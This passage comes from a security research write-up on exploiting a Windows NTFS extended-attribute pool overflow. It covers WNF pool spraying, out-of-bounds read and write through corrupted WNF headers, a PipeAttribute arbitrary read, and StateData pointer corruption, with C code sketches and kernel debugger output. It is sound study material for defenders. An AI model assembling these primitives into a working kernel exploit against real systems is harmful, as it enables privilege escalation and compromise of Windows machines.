 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with allocations of a controlled size and controlled data, so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine whether the LFH makes use of delayed free lists; from empirical testing after a large spray of Wnf chunks, I did not seem to be hitting this.
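A sketch of the resulting allocate/free cycle, with the same assumed prototypes as before (the second argument of NtDeleteWnfStateData is the optional explicit scope):

/* Sketch: allocate a Wnf chunk of a chosen size class, then free it on demand. */
void AllocThenFree(PSECURITY_DESCRIPTOR psd)
{
    WNF_STATE_NAME state;
    UCHAR data[0x10];

    memset(data, 'A', sizeof(data));
    NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine,
                         FALSE, 0, 0x1000, psd);
    NtUpdateWnfStateData(&state, data, sizeof(data), 0, 0, 0, 0);  /* _WNF_STATE_DATA allocated      */
    NtDeleteWnfStateData(&state, NULL);                            /* ExpWnfDeleteStateData frees it */
}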

Relative Memory Read

Now we have the ability to perform both a controlled allocation and a controlled free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize denotes the size of the actual data following the structure in memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
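Putting those two observations together, a sketch of the scanning loop follows (assumed prototypes as before; the 0x54545454 marker is the ChangeStamp value written by the overflow in the dump above, and states/NUM_SPRAY come from the earlier spray sketch):

/* Sketch: locate the _WNF_STATE_DATA whose header was corrupted and read OOB through it. */
#define MARKER 0x54545454

int FindCorruptedIndex(void)
{
    for (int i = 0; i < NUM_SPRAY; i++) {
        UCHAR out[0x1000];
        ULONG size  = sizeof(out);
        ULONG stamp = 0;

        if (NT_SUCCESS(NtQueryWnfStateData(&states[i], NULL, NULL, &stamp, out, &size)) &&
            stamp == MARKER) {
            /* 'size' now reflects the enlarged DataSize, so 'out' contains adjacent pool
             * chunks: headers, pool tags and pointers such as ProcessBilled. */
            printf("found corrupted element at index %d, leaked 0x%lx bytes\n", i, size);
            return i;
        }
    }
    return -1;
}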

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point it’s worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.
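A sketch of that read-modify-write pattern, reusing the corrupted state name found in the previous sketch (same assumed prototypes; 'corrupted' is the index returned by FindCorruptedIndex):

/* Sketch: read-modify-write through the corrupted state data. */
void ReadModifyWrite(int corrupted)
{
    UCHAR region[0x1000];
    ULONG size  = sizeof(region);
    ULONG stamp = 0;

    NtQueryWnfStateData(&states[corrupted], NULL, NULL, &stamp, region, &size);  /* OOB read   */
    /* ... patch fields inside 'region', e.g. an adjacent chunk's _POOL_HEADER ... */
    NtUpdateWnfStateData(&states[corrupted], region, size, 0, 0, 0, 0);           /* write back */
}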

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of the _POOL_HEADER of a 0x30-sized WNF chunk.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunk’s address to be stored within the wrong lookaside list for its size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also of a controllable size and allocated on the paged pool, it is possible to place one adjacent either to a vulnerable NTFS chunk or to a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.
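As a rough illustration of that setup (based on the struct above and the technique from the referenced paper, not on the author's code), the fake pipe attribute lives in user memory and chooses where the subsequent attribute query reads from; the attribute name and sizes here are placeholders:

/* Sketch: a fake pipe_attribute in user memory. Corrupting the real attribute's Flink to
 * point here means a later attribute query returns ValueSize bytes read from AttributeValue. */
pipe_attribute_t *BuildFakePipeAttribute(void *kernelAddressToRead, size_t readSize)
{
    pipe_attribute_t *fake = (pipe_attribute_t *)VirtualAlloc(NULL, 0x1000,
                                                              MEM_COMMIT | MEM_RESERVE,
                                                              PAGE_READWRITE);
    fake->list.Flink     = &fake->list;            /* keep the list self-consistent */
    fake->list.Blink     = &fake->list;
    fake->AttributeName  = (char *)"fakeattr";     /* name that will be looked up    */
    fake->ValueSize      = readSize;               /* number of bytes to disclose    */
    fake->AttributeValue = (char *)kernelAddressToRead;
    return fake;
}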

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor PipeAttribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal StateName needs to correspond to the external StateName being queried.

At this stage it is worth going into the StateName lookup process in more depth.

